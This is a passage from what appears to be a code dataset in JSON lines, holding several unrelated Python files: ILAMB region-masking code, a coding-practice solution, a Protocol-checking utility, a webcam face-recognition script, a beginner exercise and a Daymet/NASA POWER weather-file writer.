Each unique non-masked index\n found in this dataset will be added to the global list of\n regions along with a mask representing the region. The names\n of the regions are taken from a required attribute in the\n variable called 'labels'. This attribute should point to a\n variable which is a string array labeling each index found in\n the two-dimensional dataset.\n\n For example, the following header represents a dataset encoded\n to represent 50 of the world's largest river basins. The\n 'basin_index' variable contains integer indices 0 through 49\n where index 0 is labeled by the 0th label found in the 'label'\n variable::\n\n dimensions:\n lat = 360 ;\n lon = 720 ;\n n = 50 ;\n variables:\n string label(n) ;\n label:long_name = \"basin labels\" ;\n float lat(lat) ;\n lat:long_name = \"latitude\" ;\n lat:units = \"degrees_north\" ;\n float lon(lon) ;\n lon:long_name = \"longitude\" ;\n lon:units = \"degrees_east\" ;\n int basin_index(lat, lon) ;\n basin_index:labels = \"label\" ;\n\n Parameters\n ----------\n filename : str\n the full path of the netCDF4 file containing the regions\n\n Returns\n -------\n regions : list of str\n a list of the keys of the regions added.\n \"\"\"\n dset = Dataset(filename)\n\n # look for 2d datasets defined on regular grids\n labels = []\n for var in dset.variables:\n v = dset.variables[var]\n if len(v.dimensions) == 2 and \"labels\" in v.ncattrs():\n lat = dset.variables[v.dimensions[0]][...]\n lon = dset.variables[v.dimensions[1]][...]\n lbl = dset.variables[v.labels][...]\n nam = dset.variables[v.names][...] if \"names\" in v.ncattrs() else lbl\n ids = np.ma.compressed(np.unique(v[...]))\n assert ids.max() < lbl.size\n for i in ids:\n label = lbl[i].lower()\n name = nam[i]\n mask = v[...].data != i\n Regions._regions[label] = [name, lat, lon, mask]\n Regions._sources[label] = os.path.basename(filename)\n labels.append(label)\n return labels\n\n def getRegionName(self, label):\n \"\"\"Given the region label, return the full name.\n\n Parameters\n ----------\n label : str\n the unique region identifier\n\n Returns\n -------\n name : str\n the long name of the region\n \"\"\"\n return Regions._regions[label][0]\n\n def getRegionSource(self, label):\n \"\"\"Given the region label, return the source.\n\n Parameters\n ----------\n label : str\n the unique region identifier\n\n Returns\n -------\n name : str\n the source of the region\n \"\"\"\n return Regions._sources[label]\n\n def getMask(self, label, var):\n \"\"\"Given the region label and a ILAMB.Variable, return a mask appropriate for that variable.\n\n Parameters\n ----------\n label : str\n the unique region identifier\n var : ILAMB.Variable.Variable\n the variable to which we would like to apply a mask\n\n Returns\n -------\n mask : numpy.ndarray\n a boolean array appropriate for masking the input variable data\n \"\"\"\n\n if len(Regions._regions[label]) == 4:\n name, lat, lon, mask = Regions._regions[label]\n if lat.size == 4 and lon.size == 4:\n # if lat/lon bounds, find which bounds we are in\n rows = (\n (var.lat[:, np.newaxis] >= lat[:-1])\n * (var.lat[:, np.newaxis] <= lat[1:])\n ).argmax(axis=1)\n cols = (\n (var.lon[:, np.newaxis] >= lon[:-1])\n * (var.lon[:, np.newaxis] <= lon[1:])\n ).argmax(axis=1)\n else:\n # if more globally defined, nearest neighbor is fine\n rows = (np.abs(lat[:, np.newaxis] - var.lat)).argmin(axis=0)\n cols = (np.abs(lon[:, np.newaxis] - var.lon)).argmin(axis=0)\n if var.ndata:\n return mask[np.ix_(rows, cols)].diagonal()\n return mask[np.ix_(rows, cols)]\n\n if 
len(Regions._regions[label]) == 3:\n # we are calculating area of a lat/lon projection in this\n # routine. Suppress geopandas warning message\n warnings.filterwarnings(\"ignore\")\n try:\n import rasterio\n from rasterio import features\n except ImportError:\n msg = \"ILAMB Regions based on shapefiles requires the rasterio and geopandas modules\"\n raise ValueError(msg)\n nrows = len(var.lat)\n ncols = len(var.lon)\n res = (var.lat.max() - var.lat.min()) / nrows\n # calculate nominal pixel area for the model var\n marea = res * res / 100\n name, catid, shape = Regions._regions[label]\n transform = rasterio.transform.from_bounds(\n var.lon.min(), var.lat.max(), var.lon.max(), var.lat.min(), ncols, nrows\n )\n # create a generator with shapes to rasterize\n # subset only the polygons >= marea i.e. ignore any polygon smaller than model grid cell\n gshape = list(\n (geom, value)\n for geom, value in zip(\n shape.loc[shape.area >= marea].geometry, shape.value.unique()\n )\n )\n try:\n rregion = features.rasterize(\n shapes=gshape,\n fill=9999,\n out_shape=(nrows, ncols),\n transform=transform,\n )\n except:\n pass\n mask = rregion != catid\n warnings.filterwarnings(\"default\") # toggle warnings back on\n return mask\n\n def getMaskLatLon(self, label, var):\n \"\"\"Given the region label and a ILAMB.Variable, return a mask appropriate for that variable.\n\n Parameters\n ----------\n label : str\n the unique region identifier\n var : ILAMB.Variable.Variable\n the variable to which we would like to apply a mask\n\n Returns\n -------\n mask : numpy.ndarray\n a boolean array appropriate for masking the input variable data\n \"\"\"\n # we are calculating area of a lat/lon projection in this\n # routine. Suppress geopandas warning message\n warnings.filterwarnings(\"ignore\")\n try:\n import rasterio\n from rasterio import features\n except ImportError:\n msg = \"ILAMB Regions based on shapefiles requires the rasterio and geopandas modules\"\n raise ValueError(msg)\n if len(Regions._regions[label]) == 3:\n nrows = len(var.lat)\n ncols = len(var.lon)\n res = (var.lat.max() - var.lat.min()) / nrows\n marea = res * res\n name, catid, shape = Regions._regions[label]\n transform = rasterio.transform.from_bounds(\n var.lon.min(), var.lat.max(), var.lon.max(), var.lat.min(), ncols, nrows\n )\n gshape = list(\n (geom, value)\n for geom, value in zip(\n shape.loc[shape.area >= marea].geometry, shape.value.unique()\n )\n )\n try:\n rregion = features.rasterize(\n shapes=gshape,\n fill=9999,\n out_shape=(nrows, ncols),\n transform=transform,\n )\n except:\n pass\n mask = rregion != catid\n return var.lat, var.lon, mask\n else:\n msg = \"Regions.getMaskLatLon() is only implemented for shapefile-based regions\"\n raise ValueError(msg)\n warnings.filterwarnings(\"default\") # toggle warnings back on\n\n def hasData(self, label, var):\n \"\"\"Checks if the ILAMB.Variable has data on the given region.\n\n Parameters\n ----------\n label : str\n the unique region identifier\n var : ILAMB.Variable.Variable\n the variable to which we would like check for data\n\n Returns\n -------\n hasdata : boolean\n returns True if variable has data on the given region\n \"\"\"\n axes = range(var.data.ndim)\n if var.spatial:\n axes = axes[:-2]\n if var.ndata:\n axes = axes[:-1]\n keep = self.getMask(label, var) == False\n if var.data.mask.size == 1:\n if var.data.mask:\n keep *= 0\n else:\n keep *= (var.data.mask == False).any(axis=tuple(axes))\n if keep.sum() > 0:\n return True\n return False\n\n def setGlobalRegion(self, label: 
str) -> None:\n \"\"\"Set the default 'global' region to be used in an ILAMB analysis.\n\n Note that the previous region labeled as 'global' will be\n discarded by the system.\n\n Parameters\n ----------\n label\n the label to set as 'global'\n\n \"\"\"\n if label not in Regions._regions:\n raise ValueError(f\"The '{label}' label is not in ILAMB regions.\")\n Regions._regions[\"global\"] = Regions._regions[label]\n\n\nif \"global\" not in Regions().regions:\n # Populate some regions\n r = Regions()\n src = \"ILAMB internal\"\n r.addRegionLatLonBounds(\n \"global\", \"Globe\", (-89.999, 89.999), (-179.999, 179.999), src\n )\n Regions._regions[\"global\"][3][...] = 0.0 # ensure global mask is null\n r.addRegionLatLonBounds(\n \"globe\", \"Global - All\", (-89.999, 89.999), (-179.999, 179.999), src\n )\n Regions._regions[\"globe\"][3][...] = 0.0 # ensure global mask is null\n\n # GFED regions\n src = \"Global Fire Emissions Database (GFED)\"\n r.addRegionLatLonBounds(\n \"bona\", \"Boreal North America\", (49.75, 79.75), (-170.25, -60.25), src\n )\n r.addRegionLatLonBounds(\n \"tena\", \"Temperate North America\", (30.25, 49.75), (-125.25, -66.25), src\n )\n r.addRegionLatLonBounds(\n \"ceam\", \"Central America\", (9.75, 30.25), (-115.25, -80.25), src\n )\n r.addRegionLatLonBounds(\n \"nhsa\",\n \"Northern Hemisphere South America\",\n (0.25, 12.75),\n (-80.25, -50.25),\n src,\n )\n r.addRegionLatLonBounds(\n \"shsa\",\n \"Southern Hemisphere South America\",\n (-59.75, 0.25),\n (-80.25, -33.25),\n src,\n )\n r.addRegionLatLonBounds(\"euro\", \"Europe\", (35.25, 70.25), (-10.25, 30.25), src)\n r.addRegionLatLonBounds(\"mide\", \"Middle East\", (20.25, 40.25), (-10.25, 60.25), src)\n r.addRegionLatLonBounds(\n \"nhaf\", \"Northern Hemisphere Africa\", (0.25, 20.25), (-20.25, 45.25), src\n )\n r.addRegionLatLonBounds(\n \"shaf\", \"Southern Hemisphere Africa\", (-34.75, 0.25), (10.25, 45.25), src\n )\n r.addRegionLatLonBounds(\"boas\", \"Boreal Asia\", (54.75, 70.25), (30.25, 179.75), src)\n r.addRegionLatLonBounds(\n \"ceas\", \"Central Asia\", (30.25, 54.75), (30.25, 142.58), src\n )\n r.addRegionLatLonBounds(\n \"seas\", \"Southeast Asia\", (5.25, 30.25), (65.25, 120.25), src\n )\n r.addRegionLatLonBounds(\n \"eqas\", \"Equatorial Asia\", (-10.25, 10.25), (99.75, 150.25), src\n )\n r.addRegionLatLonBounds(\n \"aust\", \"Australia\", (-41.25, -10.50), (112.00, 154.00), src\n )\n","repo_name":"rubisco-sfa/ILAMB","sub_path":"src/ILAMB/Regions.py","file_name":"Regions.py","file_ext":"py","file_size_in_byte":15692,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"52"} +{"seq_id":"13098073885","text":"\ndef solution(arr):\n MIN, MAX = 0, 1\n arr = tuple(arr)\n\n record = {}\n def dfs(arr, target):\n if (arr, target) in record:\n return record[(arr, target)]\n if len(arr) == 1:\n return int(arr[0])\n\n best_v = -float('inf') if target == MAX else float('inf')\n\n for i in range(1, len(arr), 2):\n if arr[i] == '+':\n if target == MAX:\n best_v = max(best_v, dfs(arr[:i], MAX) + dfs(arr[i + 1:], MAX))\n else:\n best_v = min(best_v, dfs(arr[:i], MIN) + dfs(arr[i + 1:], MAX))\n else:\n if target == MAX:\n best_v = max(best_v, dfs(arr[:i], MAX) - dfs(arr[i + 1:], MIN))\n else:\n best_v = min(best_v, dfs(arr[:i], MIN) - dfs(arr[i + 1:], MIN))\n record[(arr, target)] = best_v\n return best_v\n\n return dfs(arr, MAX)\n\n\n# print(solution([\"1\", \"-\", \"3\", \"+\", \"5\", \"-\", \"8\"]))\n# print(solution([\"5\", \"-\", \"3\", \"+\", \"1\", \"+\", \"2\", 
\"-\", \"4\"]))\nprint(solution(\n [\"5\", \"-\", \"5\", \"+\", \"5\", \"-\", \"5\", \"-\", \"5\"]))\n","repo_name":"grasshopperTrainer/coding_practice","sub_path":"programmers/사칙연산 2.py","file_name":"사칙연산 2.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"24263067007","text":"from inspect import isfunction\nfrom typing import Type, Optional, get_type_hints, Callable, Any, Union\n\nfrom typing_extensions import Protocol, _get_protocol_attrs # type: ignore\n\n\nclass ReturnedUnionType(Exception):\n pass\n\n\ndef isimplementation(cls_: Optional[Type[Any]], proto: Type[Any]) -> bool:\n \"\"\"\n `isimplementation` checks to see if a provided class definition implement a provided Protocol definition.\n\n Parameters\n ----------\n cls_ : Any\n A concrete class defintiion\n proto : Any\n A protocol definition\n\n Returns\n -------\n bool\n Returns whether or not the provided class definition is a valid\n implementation of the provided Protocol.\n \"\"\"\n if cls_ is None:\n return False\n\n proto_annotations = get_type_hints(proto)\n cls_annotations = get_type_hints(cls_)\n\n for attr in _get_protocol_attrs(proto):\n try:\n proto_concrete = getattr(proto, attr)\n cls_concrete = getattr(cls_, attr)\n except AttributeError:\n proto_concrete = proto_annotations.get(attr)\n cls_concrete = cls_annotations.get(attr)\n\n if cls_concrete is None:\n return False\n\n if isfunction(proto_concrete):\n if not func_satisfies(cls_concrete, proto_concrete):\n return False\n\n continue\n\n if cls_concrete != proto_concrete:\n return False\n\n return True\n\n\ndef func_satisfies(impl: Callable[..., Any], proto: Callable[..., Any]) -> bool:\n proto_signature = get_type_hints(proto)\n\n try:\n impl_signature = get_type_hints(impl)\n except AttributeError:\n return False\n\n if issubclass(proto_signature.get(\"return\"), Protocol): # type: ignore\n proto_return: Type[Any] = proto_signature[\"return\"]\n cls_return: Optional[Type[Any]] = impl_signature.get(\"return\")\n if isimplementation(cls_return, proto_return):\n impl_signature[\"return\"] = proto_signature[\"return\"]\n\n for param, proto_type in proto_signature.items():\n try:\n impl_type = impl_signature[param]\n except KeyError:\n return False\n\n try:\n # Handle the case in which the Implementation\n # implements a satisfactory method with Union\n # types\n if impl_type.__origin__ is Union:\n if proto_type not in impl_type.__args__:\n return False\n\n if param == \"return\":\n raise ReturnedUnionType(\n f\"Returned Union type found in {impl} implementation of {proto}. 
\"\n + f\"Desired type {proto_type} is present in {impl_type} but jab cannot determine\"\n + f\"if the desired type will be returned from defined input.\"\n )\n\n continue\n except AttributeError:\n pass\n\n if proto_type != impl_type:\n return False\n\n return True\n","repo_name":"stntngo/jab","sub_path":"jab/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38095816346","text":"lista = list()\r\ntemp = list()\r\nmaior = menor = 0\r\n\r\nwhile True:\r\n temp.append(str(input('Digite o nome: ')))\r\n temp.append(float(input('Digite o peso: ')))\r\n\r\n if len(lista) == 0:\r\n maior = menor = temp[1]\r\n else:\r\n if maior < temp[1]:\r\n maior = temp[1]\r\n if menor > temp[1]:\r\n menor = temp[1]\r\n\r\n lista.append(temp[:])\r\n temp.clear()\r\n\r\n op = str(input('Deseja continuar? '))\r\n if op in 'Nn':\r\n break\r\n\r\nprint(f'Cadastros: {len(lista)}')\r\n\r\nprint(f'Maior peso: {maior} Kg. Peso de ', end=' ')\r\nfor p in lista:\r\n if p[1] == maior:\r\n print(f'{p[0]} ', end='')\r\n\r\nprint(f'Menor peso: {menor} Kg. Peso de ', end=' ')\r\nfor c in lista:\r\n if c[1] == menor:\r\n print(f'{c[0]} ', end=' ')\r\n","repo_name":"paulo-hst/python-curso-em-video","sub_path":"ex084.py","file_name":"ex084.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32663208021","text":"import cv2\r\nimport face_recognition\r\n\r\n# Load the known faces and their names\r\nknown_face_names = [\"DR_YASIR_ARAFAT_MALKANI\", \"QUAID_E_AZAM\", \"BILL_GATES\",\"MS_NIRMA_ABRO\"]\r\nknown_face_images = [face_recognition.load_image_file(\"SIR_YASIR.jpg\"),\r\n face_recognition.load_image_file(\"QUAID_E_AZAM.jpg\"),\r\n face_recognition.load_image_file(\"BILL_GATES.jpg\")]\r\n #face_recognition.load_image_file(\"NIRMA_ABRO.jpeg\")] \r\n\r\n# Encode the known faces\r\nknown_face_encodings = [face_recognition.face_encodings(image)[0] for image in known_face_images]\r\n\r\nvideo_cap = cv2.VideoCapture(0)\r\n\r\nwhile True:\r\n ret, video_data = video_cap.read()\r\n col = cv2.cvtColor(video_data, cv2.COLOR_BGR2RGB)\r\n\r\n # Find all face locations and encodings in the current frame\r\n face_locations = face_recognition.face_locations(col)\r\n face_encodings = face_recognition.face_encodings(col, face_locations)\r\n\r\n for (top, right, bottom, left), face_encoding in zip(face_locations, face_encodings):\r\n # Compare the face encoding of the detected face with the known face encodings\r\n matches = face_recognition.compare_faces(known_face_encodings, face_encoding)\r\n name = \"Unknown\"\r\n\r\n # Check if any face matches with the known faces\r\n for i in range(len(matches)):\r\n if matches[i]:\r\n name = known_face_names[i]\r\n break\r\n\r\n # Draw a rectangle and display the name of the face\r\n cv2.rectangle(video_data, (left, top), (right, bottom), (0, 255, 0), 2)\r\n cv2.putText(video_data, name, (left, top - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0), 2)\r\n\r\n cv2.imshow(\"video_live\", video_data)\r\n\r\n if cv2.waitKey(10) == ord(\"z\"):\r\n break\r\n\r\nvideo_cap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"NirmaAbro/Face_Recognition_System","sub_path":"Project.py","file_name":"Project.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 
+{"seq_id":"72450596326","text":"\"\"\"Tbw.\"\"\"\nimport requests\nimport pandas as pd\nimport numpy as np\nimport json\nimport urllib\nimport io\nimport os\nfrom openpyxl import Workbook\nfrom openpyxl.styles import Alignment\nfrom openpyxl.utils.dataframe import dataframe_to_rows\n\nDAYMET_URL = \"https://daymet.ornl.gov/single-pixel/api/data\"\n\nnasa_params = r\"PRECTOTCORR,ALLSKY_SFC_SW_DWN,T2M_MIN,T2M_MAX,WS2M\"\n# PRECTOT = Precipitation (mm day-1)\n# ALLSKY_SFC_SW_DWN = Radiation in Mj per square meter\n# T2M_MIN = Mean daily min temp at 2 Meters (C)\n# T2M_MAX = Mean daily max temp at 2 Meters (C)\n# WS2M = Daily avg wind speed at 2m above earth surface\nNASA_URL = f\"https://power.larc.nasa.gov/api/temporal/daily/point?parameters={nasa_params}&community=SB&\"\n\n\nclass Weather:\n ###\n def from_dataframe(self, wth_df):\n # check keys\n keys = [\"year\", \"yday\", \"prcp\", \"srad\", \"swe\", \"tmax\", \"tmin\", \"vp\"]\n leap_years = [yr for yr in range(1980, 2020, 4)]\n for key in keys:\n if key not in wth_df.columns:\n print('Imported weather data missing key \"%\"'.format(key))\n\n wth_df = wth_df.drop(columns=[\"f1\"], axis=1)\n\n self.init_yr = wth_df[\"year\"].min()\n self.end_yr = wth_df[\"year\"].max()\n\n self.data = pd.DataFrame()\n self.data[\"year\"] = wth_df[\"year\"]\n self.data[\"day\"] = wth_df[\"yday\"]\n self.data[\"dayL\"] = wth_df[\"dayl\"] / 3600\n self.data[\"radn\"] = wth_df[\"srad\"] * wth_df[\"dayl\"] / 3600 * 0.0036\n self.data[\"maxt\"] = wth_df[\"tmax\"]\n self.data[\"mint\"] = wth_df[\"tmin\"]\n self.data[\"prcp\"] = wth_df[\"prcp\"]\n self.data[\"swe\"] = wth_df[\"swe\"]\n self.data[\"vp\"] = wth_df[\"vp\"] * 0.001\n self.data[\"rain\"] = 0.0\n self.data[\"snow\"] = 0.0\n\n # check for leap years\n for lp_yr in leap_years:\n lp_day = self.data.loc[\n (self.data[\"year\"] == lp_yr) & (self.data[\"day\"] == 365)\n ].copy(deep=True)\n lp_day[\"day\"] = 366\n lp_day[\"yday\"] = 366\n\n self.data = self.data.append(lp_day, ignore_index=True, sort=False)\n\n self.data = self.data.sort_values(by=[\"year\", \"day\"])\n\n # check is snow-water equivalent increases next day\n for idx, row in self.data.iterrows():\n if idx == 0:\n self.data.loc[idx:idx, \"snow\"] = 0.0\n self.data.loc[idx:idx, \"rain\"] = row[\"prcp\"]\n continue\n elif idx == len(self.data) - 1:\n self.data.loc[idx:idx, \"snow\"] = 0.0\n self.data.loc[idx:idx, \"rain\"] = row[\"prcp\"]\n continue\n else:\n cur = row[\"swe\"]\n next = self.data.iloc[idx + 1][\"swe\"]\n if next > cur:\n self.data.loc[idx:idx, \"snow\"] = row[\"prcp\"]\n self.data.loc[idx:idx, \"rain\"] = 0.0\n elif (next > 0.0) & (next == cur):\n self.data.loc[idx:idx, \"snow\"] = row[\"prcp\"]\n self.data.loc[idx:idx, \"rain\"] = 0.0\n else:\n self.data.loc[idx:idx, \"snow\"] = 0.0\n self.data.loc[idx:idx, \"rain\"] = row[\"prcp\"]\n\n self.data = self.data[\n [\n \"year\",\n \"day\",\n \"radn\",\n \"maxt\",\n \"mint\",\n \"rain\",\n \"snow\",\n \"vp\",\n \"dayL\",\n ]\n ]\n\n return self\n\n ###\n def from_daymet(self, lat, lon, startyr, endyr):\n ### Daymet variables and units\n # day length (s/day)\n # min_temp (C)\n # max_temp (C)\n # precip (mm)\n # radiation (W/m2)\n # snow-water equiv. 
(kg/m2)\n # vapor pressure (Pa)\n\n attributes = [\"dayl\", \"prcp\", \"srad\", \"swe\", \"tmax\", \"tmin\", \"vp\"]\n leap_years = [yr for yr in range(1980, 2020, 4)]\n year_arr = [str(startyr + i) for i in range(endyr - startyr + 1)]\n\n self.lat = lat\n self.lon = lon\n\n payload = {\n \"lat\": str(lat),\n \"lon\": str(lon),\n \"vars\": \",\".join(attributes),\n \"years\": \",\".join(year_arr),\n }\n req = requests.get(DAYMET_URL, params=payload)\n wth_df = pd.read_csv(io.StringIO(req.text), sep=\",\", header=6)\n\n # day of year\n wth_df[\"day\"] = wth_df[\"yday\"]\n\n # daylength (hours)\n wth_df[\"dayL\"] = round(wth_df[\"dayl (s)\"] / 3600, 1)\n\n # solar radiation (MJ/m2)\n wth_df[\"radn\"] = round(\n wth_df[\"srad (W/m^2)\"] * wth_df[\"dayl (s)\"] / 3600 * 0.0036, 1\n )\n\n # max temperature (deg C)\n wth_df[\"maxt\"] = round(wth_df[\"tmax (deg c)\"], 1)\n\n # min temperature (deg C)\n wth_df[\"mint\"] = round(wth_df[\"tmin (deg c)\"], 1)\n\n # vapor pressure (kPa)\n wth_df[\"vp\"] = round(wth_df[\"vp (Pa)\"] * 0.001, 1)\n\n # snow and rain (mm)\n wth_df[\"rain\"] = 0.0\n wth_df[\"snow\"] = 0.0\n\n # The Daymet calendar is based on a standard calendar year. All Daymet\n # years have 1 - 365 days, including leap years. For leap years, the Daymet\n # database includes leap day. Values for December 31 are discarded from\n # leap years to maintain a 365-day year.\n for lp_yr in leap_years:\n lp_day = wth_df.loc[\n (wth_df[\"year\"] == lp_yr) & (wth_df[\"day\"] == 365)\n ].copy(deep=True)\n lp_day[\"day\"] = 366\n lp_day[\"yday\"] = 366\n\n wth_df = wth_df.append(lp_day, ignore_index=True)\n\n wth_df = wth_df.sort_values(by=[\"year\", \"yday\"])\n\n # check if snow-water equivalent increases next day\n for idx, row in wth_df.iterrows():\n if idx == 0:\n wth_df.iloc[idx][\"snow\"] = 0.0\n wth_df.iloc[idx][\"rain\"] = row[\"prcp (mm/day)\"]\n continue\n elif idx == len(wth_df) - 1:\n wth_df.iloc[idx][\"snow\"] = 0.0\n wth_df.iloc[idx][\"rain\"] = row[\"prcp (mm/day)\"]\n continue\n else:\n cur = row[\"swe (kg/m^2)\"]\n next = wth_df.iloc[idx + 1][\"swe (kg/m^2)\"]\n if next > cur:\n wth_df.iloc[idx][\"snow\"] = row[\"prcp (mm/day)\"]\n wth_df.iloc[idx][\"rain\"] = 0.0\n elif (next > 0.0) & (next == cur):\n wth_df.iloc[idx][\"snow\"] = row[\"prcp (mm/day)\"]\n wth_df.iloc[idx][\"rain\"] = 0.0\n else:\n wth_df.iloc[idx][\"snow\"] = 0.0\n wth_df.iloc[idx][\"rain\"] = row[\"prcp (mm/day)\"]\n\n wth_df = wth_df[\n [\n \"year\",\n \"day\",\n \"radn\",\n \"maxt\",\n \"mint\",\n \"rain\",\n \"snow\",\n \"vp\",\n \"dayL\",\n ]\n ]\n\n self.data = wth_df\n\n return self\n\n def from_nasa_power(\n self, lat, lon, start_date=19900101, end_date=20201231, format=\"JSON\"\n ):\n self.lat = lat\n self.lon = lon\n # format = 'CSV' # JSON, CSV, ASCII, ICASA, NETCDF\n # request from API\n nasa_params = r\"PRECTOTCORR,ALLSKY_SFC_SW_DWN,T2M_MIN,T2M_MAX,WS2M\"\n full_url = f\"{NASA_URL}startDate={start_year}0101&endDate={end_year}1231&lat={lat}&lon={lon}&outputList={output}&userCommunity=SSE\"\n json_response = json.loads(\n requests.get(full_url).content.decode(\"utf-8\")\n )\n # Selects the file URL from the JSON response\n csv_request_url = json_response[\"outputs\"][output.lower()]\n # Download File to Folder\n output_folder = os.path.join(output_folder)\n # create folder if doesn't exist\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n output_file_location = os.path.join(\n output_folder, os.path.basename(csv_request_url)\n )\n urllib.request.urlretrieve(csv_request_url, 
output_file_location)\n # read file and then delete\n met_df = pd.read_csv(output_file_location, header=14)\n # calculate daily mean temp\n met_df = met_df.drop([\"LAT\", \"LON\"], axis=1)\n met_df[\"meant\"] = round(\n ((met_df[\"T2M_MIN\"] + met_df[\"T2M_MAX\"]) / 2), 1\n )\n # add day of year as 'day' column in 1-365 format for apsim\n date_range = pd.date_range(f\"01-01-{start_year}\", f\"12-31-{end_year}\")\n doy = date_range.dayofyear\n met_df.insert(1, \"day\", doy)\n met_df = met_df.replace(-999, \"NA\")\n # remove original nasa power file and return dataframe\n os.remove(output_file_location)\n self.data = met_df\n return self\n\n def write_nasa_power_file(self, filepath, filename):\n # dump met file with Windows line endings\n if not os.path.exists(filepath):\n os.makedirs(filepath)\n full_path = os.path.join(filepath, filename)\n if self.lat == None:\n lat = \"\"\n lon = \"\"\n else:\n lat = self.lat\n lon = self.lon\n if filepath:\n headers = \" \".join(\n [\n \"year\",\n \"day\",\n \"month\",\n \"dom\",\n \"rain\",\n \"radn\",\n \"mint\",\n \"maxt\",\n \"windsp\",\n \"meant\",\n ]\n )\n units = \" \".join(\n [\n \"()\",\n \"()\",\n \"()\",\n \"()\",\n \"(mm)\",\n \"(Mj/m^2)\",\n \"(oC)\",\n \"(oC)\",\n \"(m/s)\",\n \"(oC)\",\n ]\n )\n with open(full_path, \"w\") as metfile:\n metfile.write(\"[weather.met.weather]\\r\\n\")\n metfile.write(\"station = Nasa Power weather\\r\\n\")\n metfile.write(\"latitude = {} (DECIMAL DEGREES)\\r\\n\".format(lat))\n metfile.write(\"longitude = {} (DECIMAL DEGREES)\\r\\n\".format(lon))\n metfile.write(\n \"tav = \" + str(round(np.mean(self.data[\"meant\"]), 1)) + \"\\r\\n\"\n )\n metfile.write(\n \"amp = \"\n + str(\n round(\n np.mean(\n self.data[\"T2M_MAX\"]\n - np.mean(self.data[\"T2M_MIN\"])\n ),\n 2,\n )\n )\n + \"\\r\\n\"\n )\n metfile.write(\n \"!Weather generated using ISU Foresite framework\\r\\n\"\n )\n metfile.write(headers + \"\\r\\n\")\n metfile.write(units + \"\\r\\n\")\n metfile.write(\n self.data.to_csv(\n sep=\" \", header=False, index=False, line_terminator=\"\\r\\n\"\n )\n )\n\n def write_nasa_excel_file(self, filepath, filename):\n if not os.path.exists(filepath):\n os.makedirs(filepath)\n full_path = os.path.join(filepath, filename)\n if self.lat == None:\n lat = \"\"\n lon = \"\"\n else:\n lat = self.lat\n lon = self.lon\n # greene_df.to_excel('greene.xlsx', index=False)\n wb = Workbook()\n ws = wb.active\n ws.alignment = Alignment(horizontal=\"left\")\n ws.append(\n [\n \"year\",\n \"day\",\n \"month\",\n \"dom\",\n \"rain\",\n \"radn\",\n \"mint\",\n \"maxt\",\n \"windsp\",\n \"meant\",\n ]\n )\n ws.append(\n [\n \"()\",\n \"()\",\n \"()\",\n \"()\",\n \"(mm)\",\n \"(MJ/m2)\",\n \"(oC)\",\n \"(oC)\",\n \"(m/s)\",\n \"(oC)\",\n ]\n )\n for r in dataframe_to_rows(self.data, index=False, header=False):\n ws.append(r)\n for cells in ws.iter_rows():\n for cell in cells:\n cell.alignment = Alignment(horizontal=\"left\")\n ws.insert_rows(1)\n ws[\"A1\"] = \"!Weather generated using C-CHANGE Foresite framework\"\n ws.insert_rows(1)\n ws[\"A1\"] = \"amp = \" + str(\n round(\n np.mean(self.data[\"T2M_MAX\"] - np.mean(self.data[\"T2M_MIN\"])),\n 2,\n )\n )\n ws.insert_rows(1)\n ws[\"A1\"] = \"tav = \" + str(round(np.mean(self.data[\"meant\"]), 2))\n ws.insert_rows(1)\n ws[\"A1\"] = f\"longitude = {lon} (DECIMAL DEGREES)\"\n ws.insert_rows(1)\n ws[\"A1\"] = f\"latitude = {lat} (DECIMAL DEGREES)\"\n ws.insert_rows(1)\n ws[\"A1\"] = \"station = NASA Power weather\"\n ws.insert_rows(1)\n ws[\"A1\"] = \"[weather.met.weather]\"\n 
full_path = os.path.join(f\"{full_path}.xlsx\")\n        wb.save(full_path)\n\n    ###\n    def write_daymet_file(self, filepath):\n        # dump met file with Windows line endings\n        if self.lat is None:\n            lat = \"\"\n            lon = \"\"\n        else:\n            lat = self.lat\n            lon = self.lon\n\n        if filepath:\n            headers = \" \".join(\n                [\n                    \"year\",\n                    \"day\",\n                    \"radn\",\n                    \"maxt\",\n                    \"mint\",\n                    \"rain\",\n                    \"snow\",\n                    \"vp\",\n                    \"dayL\",\n                ]\n            )\n            units = \" \".join(\n                [\n                    \"()\",\n                    \"()\",\n                    \"(MJ/m^2)\",\n                    \"(oC)\",\n                    \"(oC)\",\n                    \"(mm)\",\n                    \"(mm)\",\n                    \"(kPa)\",\n                    \"(hours)\",\n                ]\n            )\n\n            metfile = open(filepath, \"w\")\n            metfile.write(\"[weather.met.weather]\\r\\n\")\n            metfile.write(\"stationname = Daymet weather\\r\\n\")\n            metfile.write(\"latitude = {} (DECIMAL DEGREES)\\r\\n\".format(lat))\n            metfile.write(\"longitude = {} (DECIMAL DEGREES)\\r\\n\".format(lon))\n            metfile.write(\n                \"tav = \" + str(round(self.data[\"maxt\"].mean(), 1)) + \"\\r\\n\"\n            )\n            metfile.write(\n                \"amp = \" + str(round(self.data[\"maxt\"].max(), 1)) + \"\\r\\n\"\n            )\n            metfile.write(\n                \"!Weather generated using ISU Foresite framework\\r\\n\"\n            )\n            metfile.write(headers + \"\\r\\n\")\n            metfile.write(units + \"\\r\\n\")\n            metfile.write(\n                self.data.to_csv(\n                    sep=\" \", header=False, index=False, line_terminator=\"\\r\\n\"\n                )\n            )\n            metfile.close()\n\n    def add_daymet_spinup(self, lat, lon, init_yr, end_yr):\n        self.lat = lat\n        self.lon = lon\n        self.init_yr = init_yr\n\n        attributes = [\n            \"weather_sample_id\",\n            \"dayl\",\n            \"prcp\",\n            \"srad\",\n            \"swe\",\n            \"tmax\",\n            \"tmin\",\n            \"vp\",\n        ]\n        leap_years = [yr for yr in range(1980, 2020, 4)]\n\n        # get spinup data from Daymet\n        spup_start = init_yr\n        spup_end = end_yr\n        year_arr = [str(init_yr + i) for i in 